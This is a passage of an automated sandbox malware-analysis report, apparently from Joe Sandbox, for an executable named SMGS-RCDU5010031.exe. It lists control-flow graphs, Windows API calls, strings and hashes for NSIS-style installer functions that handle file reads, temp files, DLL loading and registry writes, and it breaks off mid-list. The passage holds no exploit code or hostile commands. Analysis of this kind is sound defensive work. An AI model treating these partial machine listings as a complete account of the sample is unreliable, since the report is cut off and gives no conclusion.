                                                                                                                                                                                                          control_flow_graph 754 4025e5-4025fa call 402ba2 757 402600-402607 754->757 758 402a4c-402a4f 754->758 759 402609 757->759 760 40260c-40260f 757->760 761 402a55-402a5b 758->761 759->760 762 402773-40277b 760->762 763 402615-402624 call 405fb0 760->763 762->758 763->762 767 40262a 763->767 768 402630-402634 767->768 769 4026c9-4026cc 768->769 770 40263a-402655 ReadFile 768->770 772 4026e4-4026f4 call 405ca8 769->772 773 4026ce-4026d1 769->773 770->762 771 40265b-402660 770->771 771->762 774 402666-402674 771->774 772->762 781 4026f6 772->781 773->772 775 4026d3-4026de call 405d06 773->775 777 40267a-40268c MultiByteToWideChar 774->777 778 40272f-40273b call 405f97 774->778 775->762 775->772 777->781 782 40268e-402691 777->782 778->761 785 4026f9-4026fc 781->785 786 402693-40269e 782->786 785->778 788 4026fe-402703 785->788 786->785 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 790 402740-402744 788->790 791 402705-40270a 788->791 789->786 792 4026c7 789->792 794 402761-40276d SetFilePointer 790->794 795 402746-40274a 790->795 791->790 793 40270c-40271f 791->793 792->781 793->762 796 402721-402727 793->796 794->762 797 402752-40275f 795->797 798 40274c-402750 795->798 796->768 799 40272d 796->799 797->762 798->794 798->797 799->762
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                                                                                                                                            • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405D1C
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                                          • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                                                                          • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040567E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 800 40567e-4056c9 CreateDirectoryW 801 4056cb-4056cd 800->801 802 4056cf-4056dc GetLastError 800->802 803 4056f6-4056f8 801->803 802->803 804 4056de-4056f2 SetFileSecurityW 802->804 804->801 805 4056f4 GetLastError 804->805 805->803
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004056D5
                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004056F4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                          • API String ID: 3449924974-26219170
                                                                                                                                                                                                          • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                          • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004063BA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 806 4063ba-4063da GetSystemDirectoryW 807 4063dc 806->807 808 4063de-4063e0 806->808 807->808 809 4063f1-4063f3 808->809 810 4063e2-4063eb 808->810 812 4063f4-406427 wsprintfW LoadLibraryExW 809->812 810->809 811 4063ed-4063ef 810->811 811->812
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                          • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                          • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 10001759 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 813 10001759-10001795 CloseHandle call 10001b18 816 100018a6-100018a8 813->816 817 1000179b-1000179f 813->817 818 100017a1-100017a7 call 10002286 817->818 819 100017a8-100017b5 call 100022d0 817->819 818->819 824 100017e5-100017ec 819->824 825 100017b7-100017bc 819->825 826 1000180c-10001810 824->826 827 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 824->827 828 100017d7-100017da 825->828 829 100017be-100017bf 825->829 830 10001812-1000184c call 100015b4 call 100024a9 826->830 831 1000184e-10001854 call 100024a9 826->831 853 10001855-10001859 827->853 828->824 832 100017dc-100017dd call 10002b5f 828->832 834 100017c1-100017c2 829->834 835 100017c7-100017c8 call 100028a4 829->835 830->853 831->853 846 100017e2 832->846 841 100017c4-100017c5 834->841 842 100017cf-100017d5 call 10002645 834->842 843 100017cd 835->843 841->824 841->835 852 100017e4 842->852 843->846 846->852 852->824 856 10001896-1000189d 853->856 857 1000185b-10001869 call 1000246c 853->857 856->816 859 1000189f-100018a0 GlobalFree 856->859 862 10001881-10001888 857->862 863 1000186b-1000186e 857->863 859->816 862->856 865 1000188a-10001895 call 1000153d 862->865 863->862 864 10001870-10001878 863->864 864->862 866 1000187a-1000187b FreeLibrary 864->866 865->856 866->862
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(100015B1), ref: 10001786
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc$CloseHandleLibrarylstrcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3864083275-3916222277
                                                                                                                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 869 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 876 4023c7-4023cf 869->876 877 402a4c-402a5b 869->877 878 4023d1-4023de call 402bbf lstrlenW 876->878 879 4023e2-4023e5 876->879 878->879 882 4023f5-4023f8 879->882 883 4023e7-4023f4 call 402ba2 879->883 887 402409-40241d RegSetValueExW 882->887 888 4023fa-402404 call 403027 882->888 883->882 891 402422-4024fc RegCloseKey 887->891 892 40241f 887->892 888->887 891->877 894 40281e-402825 891->894 892->891 894->877
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp
                                                                                                                                                                                                          • API String ID: 1356686001-3943782838
                                                                                                                                                                                                          • Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                                                                          • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405C54 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 895 405c54-405c60 896 405c61-405c95 GetTickCount GetTempFileNameW 895->896 897 405ca4-405ca6 896->897 898 405c97-405c99 896->898 900 405c9e-405ca1 897->900 898->896 899 405c9b 898->899 899->900
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C72
                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 00405C54
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                                                                                                                                          • nsa, xrefs: 00405C61
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                          • API String ID: 1716503409-2453024286
                                                                                                                                                                                                          • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                                                                          • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401FC3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                          • String ID: `OC
                                                                                                                                                                                                          • API String ID: 334405425-799166930
                                                                                                                                                                                                          • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                                                                          • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405F1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F47
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F68
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F8B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
